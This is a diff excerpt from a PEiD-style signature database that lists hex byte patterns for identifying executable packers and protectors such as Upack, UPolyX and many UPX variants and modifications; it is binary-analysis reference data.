+signature = BE 88 01 40 00 AD 8B F8 95 AD 91 F3 A5 AD B5 ?? F3 AB AD 50 97 51 58 8D 54 85 5C FF 16 72 57 2C 03 73 02 B0 00 3C 07 72 02 2C 03 50 0F B6 5F FF C1 E3 ?? B3 00 8D 1C 5B 8D 9C 9D 0C 10 00 00 B0
+ep_only = true
+
+[UPack Alt Stub -> Dwing]
+signature = 60 E8 09 00 00 00 C3 F6 00 00 E9 06 02 00 00 33 C9 5E 87 0E E3 F4 2B F1 8B DE AD 2B D8 AD
+ep_only = true
+
+[Upack v0.10 - v0.12 Beta -> Dwing]
+signature = BE 48 01 ?? ?? ?? ?? ?? 95 A5 33 C0
+ep_only = true
+
+[Upack V0.10-V0.11 -> Dwing]
+signature = BE ?? ?? ?? ?? AD 8B F8 95 A5 33 C0 33 C9 AB 48 AB F7 D8 B1 ?? F3 AB C1 E0 ?? B5 ?? F3 AB AD 50 97 51 AD 87 F5 58 8D 54 86 5C FF D5 72 5A 2C ?? 73 ?? B0 ?? 3C ?? 72 02 2C ?? 50 0F B6 5F FF C1 E3 ?? B3 ?? 8D 1C 5B 8D ?? ?? ?? ?? ?? ?? B0 ?? 67 E3 29 8B D7 2B 56 0C 8A 2A 33 D2 84 E9 0F 95 C6 52 FE C6 8A D0 8D 14 93 FF D5
+ep_only = true
+
+[UPack v0.11 -> Dwing]
+signature = BE 48 01 40 00 AD 8B F8 95 A5 33 C0 33 C9 AB 48 AB F7 D8 B1 04 F3 AB C1 E0 0A B5 1C F3 AB AD 50 97 51 AD 87 F5 58 8D 54 86 5C FF D5 72 5A 2C 03 73 02 B0 00 3C 07 72 02 2C 03 50 0F B6 5F FF C1 E3 03 B3 00 8D 1C 5B 8D 9C 9E 0C 10 00 00 B0 01 67 E3 29 8B D7
+ep_only = false
+
+[Upack v0.1x - v0.2x -> Dwing]
+signature = BE 88 01 ?? ?? AD 8B F8 95
+ep_only = true
+
+[Upack v0.2 Beta -> Dwing]
+signature = BE 88 01 ?? ?? AD 8B F8 95 A5 33 C0 33
+ep_only = true
+
+[Upack v0.21 Beta -> Dwing]
+signature = BE 88 01 ?? ?? AD 8B F8 ?? ?? ?? ?? 33
+ep_only = true
+
+[Upack v0.22 ~ v0.23 Beta -> Dwing]
+signature = 6A 07 BE 88 01 40 00 AD 8B F8 59 95 F3 A5
+ep_only = true
+
+[Upack v0.24 ~ v0.28 Alpha -> Dwing]
+signature = BE 88 01 40 00 AD ?? ?? 95 AD 91 F3 A5 AD
+ep_only = true
+
+[Upack v0.29 beta -> Dwing]
+signature = E9 ?? ?? ?? ?? 42 79 44 77 69 6E 67 40 00 00 00 50 45 00 00 4C 01 02 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 29
+ep_only = true
+
+[Upack v0.29 Beta ~ v0.31 Beta -> Dwing]
+signature = BE 88 01 ?? ?? AD 8B F8 95 AD 91 F3 A5 AD B5 ?? F3
+ep_only = false
+
+[Upack v0.30 beta -> Dwing]
+signature = E9 ?? ?? ?? ?? 42 79 44 77 69 6E 67 40 00 00 00 50 45 00 00 4C 01 02 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 30
+ep_only = true
+
+[Upack v0.31 beta -> Dwing]
+signature = E9 ?? ?? ?? ?? 42 79 44 77 69 6E 67 40 00 00 00 50 45 00 00 4C 01 02 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 31
+ep_only = true
+
+[Upack v0.32 Beta (Patch) -> Dwing]
+signature = BE 88 01 ?? ?? AD 50 ?? AD 91 F3 A5
+ep_only = false
+
+[Upack v0.32 Beta -> Dwing]
+signature = BE 88 01 ?? ?? AD 50 ?? ?? AD 91 F3 A5
+ep_only = false
+
+[Upack v0.32 Beta -> Dwing]
+signature = BE 88 01 ?? ?? AD 50 ?? AD 91 ?? F3 A5
+ep_only = false
+
+[Upack v0.32 beta -> Dwing]
+signature = E9 ?? ?? ?? ?? 42 79 44 77 69 6E 67 40 00 00 00 50 45 00 00 4C 01 02 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 32
+ep_only = true
+
+[Upack v0.33 ~ v0.34 Beta -> Dwing]
+signature = ?? ?? ?? ?? 59 F3 A5 83 C8 FF 8B DF AB 40 AB 40
+ep_only = true
+
+[Upack v0.35 alpha -> Dwing]
+signature = 8B F2 8B CA 03 4C 19 1C 03 54 1A 20
+ep_only = false
+
+[Upack V0.36 -> Dwing]
+signature = 0B 01 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 18 10 00 00 10 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 10 00 00 00 02 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 0A 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? 14 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 FF 76 08 FF 76 0C BE 1C 01
+ep_only = true
+
+[Upack V0.36 -> Dwing]
+signature = BE ?? ?? ?? ?? FF 36 E9 C3 00 00 00
+ep_only = true
+
+[Upack v0.36 alpha -> Dwing]
+signature = AB E2 E5 5D 59 8B 76 68 51 59 46 AD 85 C0
+ep_only = false
+
+[Upack v0.36 beta -> Dwing]
+signature = BE E0 11 ?? ?? FF 36 E9 C3 00 00 00 48 01 ?? ?? 0B 01 4B 45 52 4E 45 4C 33 32 2E 44 4C 4C
+ep_only = true
+
+[Upack v0.36 beta -> Dwing]
+signature = BE E0 11 ?? ?? FF 36 E9 C3 00 00 00 48 01 ?? ?? 0B 01 4B 45 52 4E 45 4C 33 32 2E 44 4C 4C ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 82 8E FE FF FF 58 8B 4E 40 5F E3
+ep_only = true
+
+[Upack V0.37 -> Dwing]
+signature = 0B 01 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 18 10 00 00 10 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 10 00 00 00 02 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 0A 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? 14 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00
+ep_only = true
+
+[Upack V0.37 -> Dwing]
+signature = 60 E8 09 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? 33 C9 5E 87 0E
+ep_only = true
+
+[Upack V0.37 -> Dwing]
+signature = BE ?? ?? ?? ?? AD 50 FF ?? ?? EB
+ep_only = true
+
+[Upack v0.37 beta -> Dwing]
+signature = BE B0 11 ?? ?? AD 50 FF 76 34 EB 7C 48 01 ?? ?? 0B 01 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 18 10 00 00 10 00 00 00 00 ?? ?? ?? 00 00 ?? ?? 00 10 00 00 00 02 00 00 04 00 00 00 00 00 37 00 04 00 00 00 00 00 00 00 00 ?? ?? ?? 00 02 00 00 00 00 00 00
+ep_only = true
+
+[Upack v0.37 beta -> Dwing]
+signature = BE B0 11 ?? ?? AD 50 FF 76 34 EB 7C 48 01 ?? ?? 0B 01 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 18 10 00 00 10 00 00 00 00 ?? ?? ?? 00 00 ?? ?? 00 10 00 00 00 02 00 00 04 00 00 00 00 00 37 00 04 00 00 00 00 00 00 00 00 ?? ?? ?? 00 02 00 00 00 00 00 00 ?? 00 00 ?? 00 00 ?? 00 00 ?? ?? 00 00 00 10 00 00 10 00 00 00 00 00 00 0A 00 00 00 00 00 00 00 00 00 00 00 EE ?? ?? ?? 14 00 00 00 00 ?? ?? ?? ?? ?? ?? 00 FF 76 38 AD 50 8B 3E BE F0 ?? ?? ?? 6A 27 59 F3 A5 FF 76 04 83 C8 FF 8B DF AB EB 1C 00 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 ?? ?? ?? ?? ?? 00 00 00 40 AB 40 B1 04 F3 AB C1 E0 0A B5 ?? F3 AB 8B 7E 0C 57 51 E9 ?? ?? ?? ?? E3 B1 04 D3 E0 03 E8 8D 53 18 33 C0 55 40 51 D3 E0 8B EA 91 FF 56 4C 33 D2 59 D1 E8 13 D2 E2 FA 5D 03 EA 45 59 89 6B 08 56 8B F7 2B F5 F3 A4 AC 5E B1 80 AA 3B 7E 34 0F 82 8E FE FF FF 58 5F 59 E3 1B 8A 07 47 04 18 3C 02 73 F7 8B 07 3C ?? 75 F1 B0 00 0F C8 03 46 38 2B C7 AB E2 E5 5E 5D 59 51 59 46 AD 85 C0 74 1F
+ep_only = true
+
+[Upack v0.37 ~ v0.38 Beta (Strip base relocation table Option)-> Dwing]
+signature = 53 18 33 C0 55 40 51 D3 E0 8B EA 91 FF 56 4C 33
+ep_only = false
+
+[Upack v0.38 beta -> Dwing]
+signature = BE B0 11 ?? ?? AD 50 FF 76 34 EB 7C 48 01 ?? ?? 0B 01 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 18 10 00 00 10 00 00 00 00 ?? ?? ?? 00 00 ?? ?? 00 10 00 00 00 02 00 00 04 00 00 00 00 00 38 00 04 00 00 00 00 00 00 00 00 ?? ?? ?? 00 02 00 00 00 00 00 00
+ep_only = true
+
+[Upack v0.38 beta -> Dwing]
+signature = BE B0 11 ?? ?? AD 50 FF 76 34 EB 7C 48 01 ?? ?? 0B 01 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 18 10 00 00 10 00 00 00 00 ?? ?? ?? 00 00 ?? ?? 00 10 00 00 00 02 00 00 04 00 00 00 00 00 38 00 04 00 00 00 00 00 00 00 00 ?? ?? ?? 00 02 00 00 00 00 00 00 ?? 00 00 ?? 00 00 ?? 00 00 ?? ?? 00 00 00 10 00 00 10 00 00 00 00 00 00 0A 00 00 00 00 00 00 00 00 00 00 00 EE ?? ?? ?? 14 00 00 00 00 ?? ?? ?? ?? ?? ?? 00 FF 76 38 AD 50 8B 3E BE F0 ?? ?? ?? 6A 27 59 F3 A5 FF 76 04 83 C8 FF 8B DF AB EB 1C 00 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 ?? ?? ?? ?? ?? 00 00 00 40 AB 40 B1 04 F3 AB C1 E0 0A B5 ?? F3 AB 8B 7E 0C 57 51 E9 ?? ?? ?? ?? E3 B1 04 D3 E0 03 E8 8D 53 18 33 C0 55 40 51 D3 E0 8B EA 91 FF 56 4C 33 D2 59 D1 E8 13 D2 E2 FA 5D 03 EA 45 59 89 6B 08 56 8B F7 2B F5 F3 A4 AC 5E B1 80 AA 3B 7E 34 0F 82 97 FE FF FF 58 5F 59 E3 1B 8A 07 47 04 18 3C 02 73 F7 8B 07 3C ?? 75 F1 B0 00 0F C8 03 46 38 2B C7 AB E2 E5 5E 5D 59 51 59 46 AD 85 C0 74 1F
+ep_only = true
+
+[Upack v0.39 final -> Dwing]
+signature = 56 10 E2 E3 B1 04 D3 E0 03 E8 8D 53 18 33 C0 55 40 51 D3 E0 8B EA 91
+ep_only = false
+
+[Upack v0.39 final -> Dwing]
+signature = FF 76 38 AD 50 8B 3E BE F0 ?? ?? ?? 6A 27 59 F3 A5 FF 76 04 83 C8 FF
+ep_only = false
+
+[Upack v0.399 -> Dwing]
+signature = 0B 01 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 18 10 00 00 10 00 00 00 00 ?? ?? 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 3A 00 04 00 00 00 00 00 00 00 00 ?? ?? 00 00 02 00 00 00 00 00 00 ?? 00 00 00 00 00 10 00 00 ?? 00 00 00 00 10 00 00 10 00 00 00 00 00 00 0A 00 00 00 00 00 00 00 00 00 00 00 EE ?? ?? 00 14 00 00 00 00 ?? ?? 00 ?? ?? 00 00 FF 76 38 AD 50 8B 3E BE F0 ?? ?? 00 6A 27 59 F3 A5 FF 76 04 83 C8 FF 8B DF AB EB 1C 00 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 ?? ?? ?? 00 ?? 00 00 00 40 AB 40 B1 04 F3 AB C1 E0 0A B5
+ep_only = true
+
+[Upack v0.399 -> Dwing]
+signature = BE B0 11 ?? ?? AD 50 FF 76 34 EB 7C 48 01 ?? ?? 0B 01 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 18 10 00 00 10 00 00 00 00 ?? ?? ?? 00 00 ?? ?? 00 10 00 00 00 02 00 00 04 00 00 00 00 00 3A 00 04 00 00 00 00 00 00 00 00 ?? ?? ?? 00 02 00 00 00 00 00 00
+ep_only = true
+
+[Upack v0.399 -> Dwing]
+signature = BE B0 11 ?? ?? AD 50 FF 76 34 EB 7C 48 01 ?? ?? 0B 01 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 18 10 00 00 10 00 00 00 00 ?? ?? ?? 00 00 ?? ?? 00 10 00 00 00 02 00 00 04 00 00 00 00 00 3A 00 04 00 00 00 00 00 00 00 00 ?? ?? ?? 00 02 00 00 00 00 00 00 ?? 00 00 ?? 00 00 10 00 00 ?? ?? 00 00 00 10 00 00 10 00 00 00 00 00 00 0A 00 00 00 00 00 00 00 00 00 00 00 EE ?? ?? ?? 14 00 00 00 00 ?? ?? ?? ?? ?? 00 00 FF 76 38 AD 50 8B 3E BE F0 ?? ?? ?? 6A 27 59 F3 A5 FF 76 04 83 C8 FF 8B DF AB EB 1C 00 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 ?? ?? ?? ?? ?? 00 00 00 40 AB 40 B1 04 F3 AB C1 E0 0A B5 ?? F3 AB 8B 7E 0C 57 51 E9 ?? ?? ?? ?? 56 10 E2 E3 B1 04 D3 E0 03 E8 8D 53 18 33 C0 55 40 51 D3 E0 8B EA 91 FF 56 4C 99 59 D1 E8 13 D2 E2 FA 5D 03 EA 45 59 89 6B 08 56 8B F7 2B F5 F3 A4 AC 5E B1 80 AA 3B
+ep_only = true
+
+[Upack_Patch -> Dwing]
+signature = 81 3A 00 00 00 02 00 00 00 00
+ep_only = true
+
+[Upack_Patch or any Version -> Dwing]
+signature = 60 E8 09 00 00 00 ?? ?? ?? 00 E9 06 02
+ep_only = true
+
+[Upack_Unknown (DLL ???) -> Dwing]
+signature = 60 E8 09 00 00 00 17 CD 00 00 E9 06 02
+ep_only = true
+
+[UPolyX v0.5]
+signature = 55 8B EC ?? 00 BD 46 00 8B ?? B9 ?? 00 00 00 80 ?? ?? 51 ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+ep_only = false
+
+[UPolyX v0.5]
+signature = 83 EC 04 89 14 24 59 BA ?? 00 00 00 52 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00
+ep_only = false
+
+[UPolyX v0.5]
+signature = BB 00 BD 46 00 83 EC 04 89 1C 24 ?? B9 ?? 00 00 00 80 33 ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+ep_only = false
+
+[UPolyX v0.5]
+signature = E8 00 00 00 00 59 83 C1 07 51 C3 C3 ?? 00 BD 46 00 83 EC 04 89 ?? 24 B9 ?? 00 00 00 81 ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+ep_only = false
+
+[UPolyX v0.5]
+signature = E8 00 00 00 00 59 83 C1 07 51 C3 C3 ?? 00 BD 46 00 ?? B9 ?? 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+ep_only = false
+
+[UPolyX v0.5]
+signature = EB 01 C3 ?? 00 BD 46 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+ep_only = false
+
+[UPX + ECLiPSE layer]
+signature = B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 33 D2 EB 01 0F 56 EB 01 0F E8 03 00 00 00 EB 01 0F EB 01 0F 5E EB 01
+ep_only = true
+
+[UPX 0.50 - 0.70]
+signature = 60 E8 00 00 00 00 58 83 E8 3D
+ep_only = true
+
+[UPX 0.72]
+signature = 60 E8 00 00 00 00 83 CD FF 31 DB 5E
+ep_only = true
+
+[UPX 2.00-3.0X -> Markus Oberhumer & Laszlo Molnar & John Reiser]
+signature = 5E 89 F7 B9 ?? ?? ?? ?? 8A 07 47 2C E8 3C 01 77 F7 80 3F ?? 75 F2 8B 07 8A 5F 04 66 C1 E8 08 C1 C0 10 86 C4 29 F8 80 EB E8 01 F0 89 07 83 C7 05 88 D8 E2 D9 8D ?? ?? ?? ?? ?? 8B 07 09 C0 74 3C 8B 5F 04 8D ?? ?? ?? ?? ?? ?? 01 F3 50 83 C7 08 FF ?? ?? ?? ?? ?? 95 8A 07 47 08 C0 74 DC 89 F9 57 48 F2 AE 55 FF ?? ?? ?? ?? ?? 09 C0 74 07 89 03 83 C3 04 EB E1 FF ?? ?? ?? ?? ?? 8B AE ?? ?? ?? ?? 8D BE 00 F0 FF FF BB 00 10 00 00 50 54 6A 04 53 57 FF D5 8D 87 ?? ?? ?? ?? 80 20 7F 80 60 28 7F 58 50 54 50 53 57 FF D5 58 61 8D 44 24 80 6A 00 39 C4 75 FA 83 EC 80 E9
+ep_only = false
+
+[UPX 2.90 [LZMA] (Delphi stub) -> Markus Oberhumer, Laszlo Molnar & John Reiser]
+signature = 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? C7 87 ?? ?? ?? ?? ?? ?? ?? ?? 57 83 CD FF 89 E5 8D 9C 24 ?? ?? ?? ?? 31 C0 50 39 DC 75 FB 46 46 53 68 ?? ?? ?? ?? 57 83 C3 04 53 68 ?? ?? ?? ?? 56 83 C3 04
+ep_only = true
+
+[UPX 2.90 [LZMA] -> Markus Oberhumer, Laszlo Molnar & John Reiser]
+signature = 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD FF 89 E5 8D 9C 24 ?? ?? ?? ?? 31 C0 50 39 DC 75 FB 46 46 53 68 ?? ?? ?? ?? 57 83 C3 04 53 68 ?? ?? ?? ?? 56 83 C3 04 53 50 C7 03 ?? ?? ?? ?? 90 90
+ep_only = true
+
+[UPX 2.90 [LZMA] -> Markus Oberhumer, Laszlo Molnar & John Reiser]
+signature = 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD FF EB 10 90 90 90 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB
+ep_only = true
+
+[UPX 2.93 - 3.00 [LZMA] -> Markus Oberhumer, Laszlo Molnar & John Reiser]
+signature = 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 89 E5 8D 9C 24 ?? ?? ?? ?? 31 C0 50 39 DC 75 FB 46 46 53 68 ?? ?? ?? ?? 57 83 C3 04 53 68 ?? ?? ?? ?? 56 83 C3 04 53 50 C7 03 03 00 02 00 90 90 90 90 90
+ep_only = true
+
+[UPX Alternative stub]
+signature = 01 DB 07 8B 1E 83 EE FC 11 DB ED B8 01 00 00 00 01 DB 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 0B
+ep_only = true
+
+[UPX Inliner v1.0 by GPcH]
+signature = 9C 60 E8 00 00 00 00 5D B8 B3 85 40 00 2D AC 85 40 00 2B E8 8D B5 D5 FE FF FF 8B 06 83 F8 00 74 11 8D B5 E1 FE FF FF 8B 06 83 F8 01 0F 84 F1 01 00 00 C7 06 01 00 00 00 8B D5 8B 85 B1 FE FF FF 2B D0 89 95 B1 FE FF FF 01 95 C9 FE FF FF 8D B5 E5 FE FF FF 01
+ep_only = false
+
+[UPX Modified stub]
+signature = 79 07 0F B7 07 47 50 47 B9 57 48 F2 AE 55 FF 96 84 ?? 00 00 09 C0 74 07 89 03 83 C3 04 EB D8 FF 96 88 ?? 00 00 61 E9 ?? ?? ?? FF
+ep_only = true
+
+[UPX Modified Stub b -> Farb-rausch Consumer Consulting]
+signature = 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD FF FC B2 80 31 DB A4 B3 02 E8 6D 00 00 00 73 F6 31 C9 E8 64 00 00 00 73 1C 31 C0 E8 5B 00 00 00 73 23 B3 02 41 B0 10 E8 4F 00 00 00 10 C0 73 F7 75 3F AA EB D4 E8 4D 00 00 00 29 D9 75 10 E8 42 00 00 00 EB 28 AC
+ep_only = true
+
+[UPX Modified Stub c -> Farb-rausch Consumer Consulting]
+signature = 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD FF FC B2 80 E8 00 00 00 00 5B 83 C3 66 A4 FF D3 73 FB 31 C9 FF D3 73 14 31 C0 FF D3 73 1D 41 B0 10 FF D3 10 C0 73 FA 75 3C AA EB E2 E8 4A 00 00 00 49 E2 10 E8 40 00 00 00 EB 28 AC D1 E8 74 45 11 C9 EB 1C 91 48
+ep_only = true
+
+[UPX Modifier v0.1x]
+signature = 50 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD
+ep_only = true
+
+[UPX Protector v1.0x]
+signature = EB EC ?? ?? ?? ?? 8A 06 46 88 07 47 01 DB 75 07
+ep_only = true
+
+[UPX Protector v1.0x (2)]
+signature = EB ?? ?? ?? ?? ?? 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB
+ep_only = false
+
+[UPX v1.03 - v1.04]
+signature = ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 8A 07 72 EB B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 ?? 75 ?? 8B 1E 83 EE FC
+ep_only = true
+
+[UPX v1.03 - v1.04 Modified]
+signature = 01 DB ?? 07 8B 1E 83 EE FC 11 DB 8A 07 ?? EB B8 01 00 00 00 01 DB ?? 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 EF
+ep_only = true
+
+[Upx v1.2 -> Marcus & Lazlo]
+signature = 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD FF EB 05 A4 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 F2 31 C0 40 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 75 07 8B 1E 83 EE FC 11 DB 73 E6 31 C9 83
+ep_only = true
+
+[UPX V1.94 -> Markus Oberhumer & Laszlo Molnar & John Reiser]
+signature = FF D5 80 A7 ?? ?? ?? ?? ?? 58 50 54 50 53 57 FF D5 58 61 8D 44 24 ?? 6A 00 39 C4 75 FA 83 EC 80 E9
+ep_only = false
+
+[UPX v2.0 -> Markus, Laszlo & Reiser]
+signature = 55 FF 96 ?? ?? ?? ?? 09 C0 74 07 89 03 83 C3 04 EB ?? FF 96 ?? ?? ?? ?? 8B AE ?? ?? ?? ?? 8D BE 00 F0 FF FF BB 00 10 00 00 50 54 6A 04 53 57 FF D5 8D 87 ?? ?? 00 00 80 20 7F 80 60 28 7F 58 50 54 50 53 57 FF D5 58 61 8D 44 24 80 6A 00 39 C4 75 FA 83 EC 80
+ep_only = false
+
+[UPX V2.00-V2.90 -> Markus Oberhumer & Laszlo Molnar & John Reiser]
+signature = FF D5 8D 87 ?? ?? ?? ?? 80 20 ?? 80 60 ?? ?? 58 50 54 50 53 57 FF D5 58 61 8D 44 24 ?? 6A 00 39 C4 75 FA 83 EC 80 E9
+ep_only = false
+
+[UPX$HiT 0.0.1 -> DJ Siba]
+signature = E2 FA 94 FF E0 61 00 00 00 00 00 00 00
+ep_only = false
+
+[UPX$HiT v0.0.1 -> DJ Siba]
+signature = 94 BC ?? ?? ?? 00 B9 ?? 00 00 00 80 34 0C ?? E2 FA 94 FF E0 61
+ep_only = false
+
+[Upx-Lock 1.0 - 1.2 --> CyberDoom / Team-X & BoB / BobSoft]
+signature = 60 E8 00 00 00 00 5D 81 ED 48 12 40 00 60 E8 2B 03 00 00 61
+ep_only = true
+
+[UPX-SCRAMBLER 3.06 -> ©OnT®oL]
+signature = E8 00 00 00 00 59 83 C1 07 51 C3 C3 BE ?? ?? ?? ?? 83 EC 04 89 34 24 B9 80 00 00 00 81 36 ?? ?? ?? ?? 50 B8 04 00 00 00 50 03 34 24 58 58 83 E9 03 E2 E9 EB D6
+ep_only = true
+
+[UPX-Scrambler RC v1.x]
+signature = 90 61 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD FF
+ep_only = true
+
+[UPX-Shit v0.1 -> 500mhz]
+signature = E8 00 00 00 00 5E 83 C6 14 AD 89 C7 AD 89 C1 AD 30 07 47 E2 FB AD FF E0 C3 00 ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 01 ?? ?? ?? 00 55 50 58 2D 53 68 69 74 20 76 30 2E 31 20 2D 20 77 77 77 2E 62 6C 61 63 6B 6C 6F 67 69 63 2E 6E 65 74 20 2D 20 63 6F 64 65 20 62 79
+ep_only = true
+
+[UPX-Shit v0.1 -> 500mhz]
+signature = E8 00 00 00 00 5E 83 C6 14 AD 89 C7 AD 89 C1 AD 30 07 47 E2 FB AD FF E0 C3 00 ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? 00 55 50 58 2D 53 68 69 74 20 76 30 2E 31 20 2D 20 77 77 77 2E 62 6C 61 63 6B 6C 6F 67 69 63 2E 6E 65 74 20 2D 20 63 6F 64 65 20 62 79
+ep_only = true
+
+[UPX-Shit v0.1 -> 500mhz]
